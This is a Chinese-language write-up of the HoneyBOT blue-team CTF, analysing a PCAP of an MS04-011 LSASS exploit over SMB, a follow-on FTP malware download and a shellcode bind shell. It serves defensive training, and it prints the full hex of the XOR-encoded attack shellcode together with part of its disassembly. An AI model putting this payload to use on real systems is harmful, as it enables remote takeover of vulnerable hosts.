HoneyBOT Blue Team Challenge

# HoneyBOT Blue Team Challenge :::success https://cyberdefenders.org/blueteam-ctf-challenges/45#nav-overview ::: :::info A PCAP analysis exercise highlighting attacker's interactions with honeypots and how automatic exploitation works.. (Note that the IP address of the victim has been changed to hide the true location.) As a soc analyst, analyze the artifacts and answer the questions. Tools: BrimSecurity NetworkMiner Wireshark Libemu (sctest) scdbg IP LookUp ::: #### 1. What is the attacker's IP address? ``` 98.114.205.102 ``` 檢視封包內容，Server端192.150.11.111，有開445(SMB)，攻擊者來源為98.114.205.102。 ![截圖 2023-12-04 下午2.38.30](https://hackmd.io/_uploads/rkVgNgiH6.jpg) ![截圖 2023-12-04 下午2.38.44](https://hackmd.io/_uploads/BJN-VlsBa.jpg) #### 2. What is the target's IP address? ``` 192.150.11.111 ``` 承上題，Server端192.150.11.111。 #### 3. Provide the country code for the attacker's IP address (a.k.a geo-location). ``` US ``` geoip查詢結果為US ![截圖 2023-12-04 下午2.40.53](https://hackmd.io/_uploads/HJrYEgjrp.jpg) 參考資料： https://www.maxmind.com/en/geoip-demo #### 4. How many TCP sessions are present in the captured traffic? ``` 5 ``` 利用Conversations來檢視TCP，可以看到有5個session ![截圖 2023-12-04 下午2.53.47](https://hackmd.io/_uploads/BkOYPlorT.jpg) #### 5. How long did it take to perform the attack (in seconds)? ``` 16 ``` 封包時間為16秒 ![截圖 2023-12-04 下午2.55.52](https://hackmd.io/_uploads/rJUWuesHT.jpg) #### 7. Provide the CVE number of the exploited vulnerability. ``` CVE-2003-0533 ``` 檢視protocol發現有DCE/RPC ![截圖 2023-12-04 下午3.27.31](https://hackmd.io/_uploads/SkE_JZira.jpg) filter過濾decrpc後會看到關鍵字DsRoleUpgradeDownlevelServer ![截圖 2023-12-04 下午3.29.05](https://hackmd.io/_uploads/SJbC1WsHp.jpg) 搜尋「DsRoleUpgradeDownlevelServer CVE 2003」之後會看到CVE-2003-0533(MS04-011) ![截圖 2023-12-04 下午3.31.46](https://hackmd.io/_uploads/HyADlbiSp.jpg) 參考資料： https://vuldb.com/zh/?id.599 #### 8. Which protocol was used to carry over the exploit? ``` SMB ``` 承上題，使用SMB協定 #### 9. Which protocol did the attacker use to download additional malicious files to the target system? ``` ftp ``` follow tcp 可以發現在封包44後有利用ftp傳檔 ![截圖 2023-12-04 下午4.34.46](https://hackmd.io/_uploads/S1FV1Gorp.jpg) #### 10. What is the name of the downloaded malware? ``` smss.exe ``` 承上題 #### 11. The attacker's server was listening on a specific port. Provide the port number. ``` 8884 ``` 承上上題 #### 12. When was the involved malware first submitted to VirusTotal for analysis? Format: YYYY-MM-DD ``` 2007-06-27 ``` 封包72可以看到MZ開頭的執行檔內容，follow tcp後另存成smss.exe檔 ![截圖 2023-12-04 下午4.54.06](https://hackmd.io/_uploads/Sys3QfoBa.jpg) ![截圖 2023-12-04 下午4.53.02](https://hackmd.io/_uploads/r1yK7fiHp.jpg) 上傳到virustotal檢測，可以看到first submitted時間 ![截圖 2023-12-04 下午4.52.27](https://hackmd.io/_uploads/B1w8mMsHa.jpg) #### 13. What is the key used to encode the shellcode? ``` 0x99 ``` 搜尋得知CVE-2003-0533是利用區溢位攻擊的一個CVE，檢視封包內容後發現在tcp.stream eq 1可以看到疑似區溢位攻擊的行為。 ![截圖 2023-12-05 上午11.30.48](https://hackmd.io/_uploads/rJDutfnH6.jpg) 擷取之來的區溢位攻擊如下 :::warning eb105a4a33c966b97d0180340a99e2faeb05e8ebffffff7095989999c3fd38a999999912d99512e9853412d991124112eaa512ed87e19a6a12e7b99a6212d78daa74cfcec812a69a62126bf397c06a3fed91c0c61a5e9ddc7b70c0c6c7125412dfbd9a5a48789a58aa50ff129112df859a5a58789b9a5812999a5a1263126e1a5f971249f39ac0711e9999991a5f94cbcf66ce65c31241f39cc071ed999999c9c9c9c9f398f39b66ce7512415e9e9b999e3caa5910de9df389ceca66ce69f398ca66ce6dc9c9ca66ce6112491a75dd126daa59f389c0109d177b6210cfa110cfa510cfd9ff5edfb5989814de89c9cfaa50c8c8c8f398c8c85edea5faf4fd9914dea5c9c866ce79cb66ce65ca66ce65c966ce7daa59351c59ec60c8cbcfca664bc3c0327b77aa595a7176676666defcedc9ebf6fad8fdfdebfceaea99daebfcf8edfcc9ebf6fafceaead899dce1f0edcdf1ebfcf8fd99d5f6f8fdd5f0fbebf8ebe0d899eeeaabc6aaab99cecad8caf6faf2fcedd899fbf0f7fd99f5f0eaedfcf799f8fafafce9ed99faf5f6eafceaf6faf2fced99 ::: 利用線上Assembler and Disassembler工具進行解碼，可以看到利用0x99進行XOR編碼。 ![截圖 2023-12-05 上午11.52.38](https://hackmd.io/_uploads/H1mc0fnHa.jpg) 擷取出來的攻擊shellcode如下： ```! 0x0000000000000000: EB 10 jmp 0x12 0x0000000000000002: 5A pop rdx 0x0000000000000003: 4A 33 C9 xor rcx, rcx 0x0000000000000006: 66 B9 7D 01 mov cx, 0x17d 0x000000000000000a: 80 34 0A 99 xor byte ptr [rdx + rcx], 0x99 0x000000000000000e: E2 FA loop 0xa 0x0000000000000010: EB 05 jmp 0x17 0x0000000000000012: E8 EB FF FF FF call 2 0x0000000000000017: 70 95 jo 0xffffffffffffffae 0x0000000000000019: 98 cwde 0x000000000000001a: 99 cdq 0x000000000000001b: 99 cdq 0x000000000000001c: C3 ret 0x000000000000001d: FD std 0x000000000000001e: 38 A9 99 99 99 12 cmp byte ptr [rcx + 0x12999999], ch 0x0000000000000024: D9 95 12 E9 85 34 fst dword ptr [rbp + 0x3485e912] 0x000000000000002a: 12 D9 adc bl, cl 0x000000000000002c: 91 xchg eax, ecx 0x000000000000002d: 12 41 12 adc al, byte ptr [rcx + 0x12] ``` 參考資料： https://shell-storm.org/online/Online-Assembler-and-Disassembler/?opcodes=488b59e0f6430f01740d49baa0d27672a57f000041ff23554889e556574883ec&arch=x86-64&endianness=little&dis_with_addr=True&dis_with_raw=True&dis_with_ins=True #### 14. What is the port number the shellcode binds to? ``` 1957 ``` 區溢位攻擊之後可以看到攻擊者對1957 port進行連線。 ![截圖 2023-12-05 下午12.11.01](https://hackmd.io/_uploads/SyVyXX2BT.jpg) 可以用工具scdbg執行針對shellcode分析， ![截圖 2023-12-05 下午1.54.14](https://hackmd.io/_uploads/rkMMi43Ha.jpg) #### 15. The shellcode used a specific technique to determine its location in memory. What is the OS file being queried during this process? ``` kernel32.dll ``` 承上題，可以看到shellcode執行過程會一直執行GetProcAddress，查詢後可以知道他是kernel32.dll的一個function ![截圖 2023-12-05 下午2.15.33](https://hackmd.io/_uploads/rJzMgB3Sa.jpg) 參考資料： https://learn.microsoft.com/zh-tw/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress